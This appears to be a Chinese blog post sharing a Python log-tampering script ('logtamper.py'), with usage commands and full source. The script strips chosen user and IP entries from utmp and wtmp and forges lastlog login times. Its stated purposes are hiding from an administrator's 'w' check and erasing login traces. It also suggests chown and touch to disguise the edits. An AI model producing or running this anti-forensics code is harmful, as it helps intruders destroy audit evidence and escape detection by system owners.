python修改linux日志(logtamper.py)

  经常用到xi4oyu大神的logtamper，非常之方便。但是有些场景下可能没条件编译、于是参照logtamper源码以及Intersect的源码写了个py版，参数和原版差不多。

躲避管理员w查看

python logtamper.py -m 1 -u b4dboy -i 192.168.0.188

清除指定ip的登录日志

python logtamper.py -m 2 -u b4dboy -i 192.168.0.188

修改上次登录时间地点

python logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2014:05:28:10:11:12

最后自己再确认下看有没有修改成功，可以使用chown、touch命令修改时间和使用者，程序代码如下：

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123

#!/usr/bin/env python# -*- coding:utf-8 -*-# mail: cn.b4dboy@gmail.comimport os, struct, sysfrom pwd import getpwnamfrom time import strptime, mktimefrom optparse import OptionParserUTMPFILE = "/var/run/utmp"WTMPFILE = "/var/log/wtmp"LASTLOGFILE = "/var/log/lastlog"LAST_STRUCT = 'I32s256s'LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)def getXtmp(filename, username, hostname):    xtmp = ''    try:        fp = open(filename, 'rb')        while True:            bytes = fp.read(XTMP_STRUCT_SIZE)            if not bytes:                break            data = struct.unpack(XTMP_STRUCT, bytes)            record = [(lambda s: str(s).split("\0", 1)[0])(i) for i in data]            if (record[4] == username and record[5] == hostname):                continue            xtmp += bytes    except:        showMessage('Cannot open file: %s' % filename)    finally:        fp.close()    return xtmpdef modifyLast(filename, username, hostname, ttyname, strtime):    try:        p = getpwnam(username)    except:        showMessage('No such user.')    timestamp = 0    try:        str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S')        timestamp = int(mktime(str2time))    except:        showMessage('Time format err.')    data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname)    try:        fp = open(filename, 'wb')        fp.seek(LAST_STRUCT_SIZE * p.pw_uid)        fp.write(data)    except:        showMessage('Cannot open file: %s' % filename)    finally:        fp.close()    return Truedef showMessage(msg):    print msg    exit(-1)def saveFile(filename, contents):    try:        fp = open(filename, 'w+b')        fp.write(contents)    except IOError as e:        showMessage(e)    finally:        fp.close()if __name__ == '__main__':    usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188\n \        logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12'    parser = OptionParser(usage=usage)    parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]')    parser.add_option('-t', '--ttyname', dest='TTYNAME')    parser.add_option('-f', '--filename', dest='FILENAME')    parser.add_option('-u', '--username', dest='USERNAME')    parser.add_option('-i', '--hostname', dest='HOSTNAME')    parser.add_option('-d', '--dateline', dest='DATELINE')    (options, args) = parser.parse_args()    if len(args) < 3:        if options.MODE == '1':            if options.USERNAME == None or options.HOSTNAME == None:                showMessage('+[Warning]: Incorrect parameter.\n')            if options.FILENAME == None:                options.FILENAME = UTMPFILE            # tamper            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)            saveFile(options.FILENAME, newData)        elif options.MODE == '2':            if options.USERNAME == None or options.HOSTNAME == None:                showMessage('+[Warning]: Incorrect parameter.\n')            if options.FILENAME == None:                options.FILENAME = WTMPFILE            # tamper            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)            saveFile(options.FILENAME, newData)        elif options.MODE == '3':            if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None:                showMessage('+[Warning]: Incorrect parameter.\n')            if options.FILENAME == None:                options.FILENAME = LASTLOGFILE            # tamper            modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE)        else:            parser.print_help()